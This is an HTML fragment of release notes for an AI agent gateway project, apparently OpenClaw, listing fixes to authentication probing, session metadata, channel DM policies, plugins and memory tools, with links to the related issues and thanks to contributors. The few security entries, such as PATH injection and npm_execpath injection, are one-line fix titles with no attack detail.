<li>Agents/auth: scope external CLI credential discovery to configured providers during model auth status and startup prewarm, so opencode-only and other single-provider gateways do not block on unrelated Claude CLI Keychain probes. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4347237976" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/73908" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/73908/hovercard" href="https://github.com/openclaw/openclaw/issues/73908">#73908</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Ailuras/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Ailuras">@Ailuras</a>.</li>
<li>Agents/model selection: resolve slash-form aliases before provider/model parsing and keep alias-resolved primary models subject to transient provider cooldowns, so cron and persisted sessions do not retry cooled-down raw aliases. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4343366616" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/73573" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/73573/hovercard" href="https://github.com/openclaw/openclaw/issues/73573">#73573</a> and <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4344524821" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/73657" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/73657/hovercard" href="https://github.com/openclaw/openclaw/issues/73657">#73657</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/akai-shuuichi/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/akai-shuuichi">@akai-shuuichi</a> and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/hashslingers/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/hashslingers">@hashslingers</a>.</li>
<li>Agents/Claude CLI: reuse already-cached macOS Keychain credentials for no-prompt Claude credential reads, so doctor/runtime checks do not miss fresh interactive Claude auth. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4344788745" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/73682" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/73682/hovercard" href="https://github.com/openclaw/openclaw/issues/73682">#73682</a>. Thanks @RyanSandoval.</li>
<li>Agents/Claude CLI doctor: scope workspace and project-dir checks to agents that actually use the Claude CLI runtime, so non-default Claude agents no longer make the default agent look Claude-backed. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4347196394" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/73903" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/73903/hovercard" href="https://github.com/openclaw/openclaw/issues/73903">#73903</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/bobfreeman1989/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/bobfreeman1989">@bobfreeman1989</a>.</li>
<li>Gateway/sessions: expose effective agent runtime metadata on session rows, <code>sessions.patch</code>, and local <code>openclaw sessions --json</code>, while keeping Claude CLI-backed rows on the canonical model provider so runtime backend and model identity are no longer conflated. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4339520660" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/73090" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/73090/hovercard" href="https://github.com/openclaw/openclaw/issues/73090">#73090</a>. Thanks @vishutdhar.</li>
<li>Gateway/auth status: scope external CLI credential overlays to configured providers, runtimes, or profiles and keep status reads off new Keychain prompts, so single-provider Gateway configs no longer probe unrelated Claude/Codex/MiniMax auth on startup. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4347237976" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/73908" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/73908/hovercard" href="https://github.com/openclaw/openclaw/issues/73908">#73908</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Ailuras/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Ailuras">@Ailuras</a>.</li>
<li>Agents/runtime status: expose effective agent runtime metadata in <code>agents.list</code>, Control UI agent panels, and <code>/agents</code>, and avoid rendering stale or cumulative CLI token totals as live context usage. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4344570308" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/73660" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/73660/hovercard" href="https://github.com/openclaw/openclaw/issues/73660">#73660</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4343419061" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/73578" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/73578/hovercard" href="https://github.com/openclaw/openclaw/issues/73578">#73578</a>, and <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4072029751" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/45268" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/45268/hovercard" href="https://github.com/openclaw/openclaw/issues/45268">#45268</a>. Thanks @spartman, @DashLabsDev, and @xyooz.</li>
<li>Agents/transcripts: strip empty assistant text blocks while preserving valid text, images, and signatures, so Anthropic-style providers no longer reject sanitized transcript turns. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4344345617" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/73640" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/73640/hovercard" href="https://github.com/openclaw/openclaw/issues/73640">#73640</a>. Thanks @jowhee327.</li>
<li>Gateway/sessions: preserve session keys on hidden lifecycle events so channel-routed runs still persist terminal session state and do not strand session status as running after Codex turn completion. Thanks @cathrynlavery.</li>
<li>Providers/Bedrock: omit deprecated <code>temperature</code> for Claude Opus 4.7 Bedrock model ids, named and application inference profiles, including dotted <code>opus-4.7</code> refs, and classify the nested validation response for failover. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4344649937" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/73663" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/73663/hovercard" href="https://github.com/openclaw/openclaw/issues/73663">#73663</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/bstanbury/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/bstanbury">@bstanbury</a>.</li>
<li>Gateway: raise the preauth/connect-challenge timeout to 15s so cold CLI starts on slower hosts have more time to process the WebSocket challenge before the Gateway closes the connection. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4111642035" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/51469" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/51469/hovercard" href="https://github.com/openclaw/openclaw/issues/51469">#51469</a>; refs <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4343737030" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/73592" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/73592/hovercard" href="https://github.com/openclaw/openclaw/issues/73592">#73592</a> and <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4213272898" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/62060" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/62060/hovercard" href="https://github.com/openclaw/openclaw/pull/62060">#62060</a>. Thanks @GothicFox and @jackychen-png.</li>
<li>CLI/status: fall back to a bounded local <code>status</code> RPC when loopback detail probes time out or report unknown capability, so reachable local gateways are no longer marked unreachable by slow read diagnostics. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4342797952" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/73535" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/73535/hovercard" href="https://github.com/openclaw/openclaw/issues/73535">#73535</a>; refs <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4083597939" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/48360" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/48360/hovercard" href="https://github.com/openclaw/openclaw/issues/48360">#48360</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4221198235" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/62762" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/62762/hovercard" href="https://github.com/openclaw/openclaw/issues/62762">#62762</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4110811160" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/51357" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/51357/hovercard" href="https://github.com/openclaw/openclaw/issues/51357">#51357</a>, and <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4050661491" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/42019" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/42019/hovercard" href="https://github.com/openclaw/openclaw/issues/42019">#42019</a>. Thanks @RacecarGuy, @justinschille, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/DJBlackhawk/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/DJBlackhawk">@DJBlackhawk</a>, @tianyaqpzm, and @0xrsydn.</li>
<li>CLI/gateway: reuse cached paired-device auth during <code>gateway probe</code> and report post-connect diagnostic failures as degraded reachability, so healthy local gateways are no longer marked unreachable after loopback auth or read timeouts. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4083597939" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/48360" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/48360/hovercard" href="https://github.com/openclaw/openclaw/issues/48360">#48360</a>. Thanks @RacecarGuy.</li>
<li>Channels/Discord: give Discord Gateway WebSocket handshakes a 30s timeout so stalled TLS/network transitions emit an error and Carbon can continue its reconnect loop instead of leaving the bot silent until restart. Refs <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4097993139" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/50046" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/50046/hovercard" href="https://github.com/openclaw/openclaw/pull/50046">#50046</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/codexGW/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/codexGW">@codexGW</a>.</li>
<li>Mattermost/WebSocket: send protocol ping/pong keepalives and terminate stale sessions when pongs stop arriving, so silent TCP drops reconnect instead of leaving monitoring idle. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4049689741" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/41837" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/41837/hovercard" href="https://github.com/openclaw/openclaw/issues/41837">#41837</a>; carries forward <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4169293678" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/57621" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/57621/hovercard" href="https://github.com/openclaw/openclaw/pull/57621">#57621</a>; refs <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4098800956" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/50138" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/50138/hovercard" href="https://github.com/openclaw/openclaw/issues/50138">#50138</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4065388815" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/44160" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/44160/hovercard" href="https://github.com/openclaw/openclaw/issues/44160">#44160</a>, and <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4108428334" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/51104" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/51104/hovercard" href="https://github.com/openclaw/openclaw/issues/51104">#51104</a>. Thanks @JasonWang1124.</li>
<li>Channels/Telegram: suppress standalone failed edit/write warning payloads when a user-facing assistant error reply already covers the turn, while keeping unresolved mutating failures visible behind success-looking or suppressed-error replies. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4040841536" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/39631" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/39631/hovercard" href="https://github.com/openclaw/openclaw/issues/39631">#39631</a>; refs <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4345454858" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/73750" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/73750/hovercard" href="https://github.com/openclaw/openclaw/pull/73750">#73750</a>; carries forward <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4040858007" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/39636" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/39636/hovercard" href="https://github.com/openclaw/openclaw/pull/39636">#39636</a> and <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4041006323" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/39717" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/39717/hovercard" href="https://github.com/openclaw/openclaw/pull/39717">#39717</a>; leaves <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4040278873" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/39406" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/39406/hovercard" href="https://github.com/openclaw/openclaw/issues/39406">#39406</a> for configurable delivery policy. Thanks @Bartok9 and @Bortlesboat.</li>
<li>Control UI/agents: persist the Set Default action through <code>agents.list[].default</code> instead of writing the unsupported <code>agents.defaultId</code> field, so saved default-agent changes survive config validation. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4250028068" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/65565" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/65565/hovercard" href="https://github.com/openclaw/openclaw/issues/65565">#65565</a>; carries forward <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4333057256" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/72585" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/72585/hovercard" href="https://github.com/openclaw/openclaw/pull/72585">#72585</a>. Thanks @luyao618.</li>
<li>NVIDIA/NIM: persist the <code>NVIDIA_API_KEY</code> provider marker and mark bundled NVIDIA Chat Completions models as string-content compatible, so NIM models load from <code>models.json</code> and OpenAI-compatible subagent calls send plain text content. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4338530888" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/73013" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/73013/hovercard" href="https://github.com/openclaw/openclaw/issues/73013">#73013</a> and <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4098604940" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/50107" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/50107/hovercard" href="https://github.com/openclaw/openclaw/issues/50107">#50107</a>; refs <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4338532925" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/73014" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/73014/hovercard" href="https://github.com/openclaw/openclaw/issues/73014">#73014</a>. Thanks @bautrey, @iot2edge, @ifearghal, and @futhgar.</li>
<li>Channels/Discord: let text-only configs drop the <code>GuildVoiceStates</code> gateway intent and expose a bounded <code>/gateway/bot</code> metadata timeout with rate-limited fallback logs, reducing idle CPU and warning floods. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4345114420" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/73709" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/73709/hovercard" href="https://github.com/openclaw/openclaw/issues/73709">#73709</a> and <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4343589386" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/73585" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/73585/hovercard" href="https://github.com/openclaw/openclaw/issues/73585">#73585</a>. Thanks @sanchezm86 and @trac3r00.</li>
<li>Agents/sessions: mark same-turn <code>sessions_send</code> and A2A reply prompts with an inter-session <code>isUser=false</code> envelope before they reach the model, so foreign session output no longer lands as bare active user text. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4345004992" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/73702" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/73702/hovercard" href="https://github.com/openclaw/openclaw/issues/73702">#73702</a>; refs <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4344960552" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/73698" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/73698/hovercard" href="https://github.com/openclaw/openclaw/issues/73698">#73698</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4344064139" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/73609" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/73609/hovercard" href="https://github.com/openclaw/openclaw/issues/73609">#73609</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4343780208" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/73595" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/73595/hovercard" href="https://github.com/openclaw/openclaw/issues/73595">#73595</a>, and <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4344203540" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/73622" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/73622/hovercard" href="https://github.com/openclaw/openclaw/issues/73622">#73622</a>. Thanks @alvelda.</li>
<li>Channels/Telegram: fail closed when account-level public DM settings conflict with a restrictive top-level <code>allowFrom</code>, and require an effective wildcard before <code>dmPolicy="open"</code> behaves as public access. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4345556370" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/73756" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/73756/hovercard" href="https://github.com/openclaw/openclaw/issues/73756">#73756</a>; refs <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4344960552" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/73698" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/73698/hovercard" href="https://github.com/openclaw/openclaw/issues/73698">#73698</a>. Thanks @Hilo-Hilo and @xace1825.</li>
<li>Channels/security: move open-DM allowlist semantics into the shared policy helpers and align Discord, Slack, Mattermost, Matrix, Feishu, LINE, IRC, Google Chat, Zalo, Zalo User, QQ Bot, and Synology Chat so <code>dmPolicy="open"</code> is public only with an effective wildcard and otherwise still respects sender allowlists. Refs <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4345556370" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/73756" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/73756/hovercard" href="https://github.com/openclaw/openclaw/issues/73756">#73756</a> and <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4344960552" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/73698" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/73698/hovercard" href="https://github.com/openclaw/openclaw/issues/73698">#73698</a>. Thanks @Hilo-Hilo and @xace1825.</li>
<li>ACP/tasks: sweep orphaned parent-owned ACP sessions whose task records are gone, preserving bound persistent sessions but clearing unbound stale ACPX metadata so old child sessions cannot silently respawn into chat. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4344064139" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/73609" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/73609/hovercard" href="https://github.com/openclaw/openclaw/issues/73609">#73609</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/joerod26/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/joerod26">@joerod26</a>.</li>
<li>Outbound/security: strip known internal runtime scaffolding such as <code>&lt;system-reminder&gt;</code> and <code>&lt;previous_response&gt;</code> at the final channel delivery boundary and keep Discord output on targeted tag stripping, so degraded harness replies cannot leak those tags to users. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4343780208" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/73595" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/73595/hovercard" href="https://github.com/openclaw/openclaw/issues/73595">#73595</a>. Thanks @gabrielexito-stack and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/martingarramon/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/martingarramon">@martingarramon</a>.</li>
<li>Security/Telegram: load Telegram security adapters in read-only audit/doctor, audit malformed Telegram DM <code>allowFrom</code> entries even when groups are disabled, and keep allowlist DM audits from counting stale pairing-store senders, so public/shared-DM risk checks stay accurate. Refs <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4344960552" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/73698" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/73698/hovercard" href="https://github.com/openclaw/openclaw/issues/73698">#73698</a>. Thanks @xace1825.</li>
<li>Plugins: remove hidden manifest, provider-owner, bootstrap, and channel metadata caches so plugin installs, manifest edits, and bundled-root changes are visible on the next metadata read while keeping runtime/module loader caches for actual plugin code. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/shakkernerd/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/shakkernerd">@shakkernerd</a>.</li>
<li>CLI/plugins: use plugin metadata snapshots for install slot selection and add opt-in plugin lifecycle timing traces, so plugin install avoids runtime-loading the plugin registry for metadata-only decisions. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/shakkernerd/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/shakkernerd">@shakkernerd</a>.</li>
<li>fix(plugins): restrict bundled plugin dir resolution to trusted package roots. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4340652676" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/73275" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/73275/hovercard" href="https://github.com/openclaw/openclaw/pull/73275">#73275</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/pgondhi987/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/pgondhi987">@pgondhi987</a>.</li>
<li>fix(security): prevent workspace PATH injection via service env and trash helpers. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4340617524" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/73264" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/73264/hovercard" href="https://github.com/openclaw/openclaw/pull/73264">#73264</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/pgondhi987/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/pgondhi987">@pgondhi987</a>.</li>
<li>Active Memory: allow <code>allowedChatTypes</code> to include explicit portal/webchat sessions and classify <code>agent:...:explicit:...</code> session keys before opaque session ids can shadow the chat type. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4252129588" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/65775" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/65775/hovercard" href="https://github.com/openclaw/openclaw/issues/65775">#65775</a>. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4259069037" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/66285" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/66285/hovercard" href="https://github.com/openclaw/openclaw/pull/66285">#66285</a>) Thanks @Lidang-Jiang.</li>
<li>Active Memory: allow the hidden recall sub-agent to use both <code>memory_recall</code> and the legacy <code>memory_search</code>/<code>memory_get</code> memory tool contract, so bundled <code>memory-lancedb</code> recall works without breaking the default <code>memory-core</code> path. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4342562900" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/73502" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/73502/hovercard" href="https://github.com/openclaw/openclaw/issues/73502">#73502</a>. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4343523222" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/73584" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/73584/hovercard" href="https://github.com/openclaw/openclaw/pull/73584">#73584</a>) Thanks @Takhoffman.</li>
<li>fix(device-pairing): validate callerScopes against resolved token scopes on repair [AI]. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4337345824" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/72925" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/72925/hovercard" href="https://github.com/openclaw/openclaw/pull/72925">#72925</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/pgondhi987/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/pgondhi987">@pgondhi987</a>.</li>
<li>Active Memory docs: document the <code>cacheTtlMs</code> 1000-120000 ms range and 15000 ms default so setup snippets do not lead users past the schema limit. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4251274400" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/65708" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/65708/hovercard" href="https://github.com/openclaw/openclaw/issues/65708">#65708</a>. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4251576914" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/65737" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/65737/hovercard" href="https://github.com/openclaw/openclaw/pull/65737">#65737</a>) Thanks @WuKongAI-CMU.</li>
<li>fix(agents): canonicalize provider aliases in byProvider tool policy lookup [AI]. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4337295525" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/72917" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/72917/hovercard" href="https://github.com/openclaw/openclaw/pull/72917">#72917</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/pgondhi987/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/pgondhi987">@pgondhi987</a>.</li>
<li>fix(security): block npm_execpath injection from workspace .env [AI-assisted]. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4340604156" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/73262" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/73262/hovercard" href="https://github.com/openclaw/openclaw/pull/73262">#73262</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/pgondhi987/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/pgondhi987">@pgondhi987</a>.</li>
<li>Tools/web_fetch: decode response bodies from raw bytes using declared HTTP, XML, or HTML meta charsets before extraction, so Shift_JIS and other legacy-charset pages no longer return mojibake. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4337284956" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/72916" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/72916/hovercard" href="https://github.com/openclaw/openclaw/issues/72916">#72916</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/amknight/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/amknight">@amknight</a>.</li>
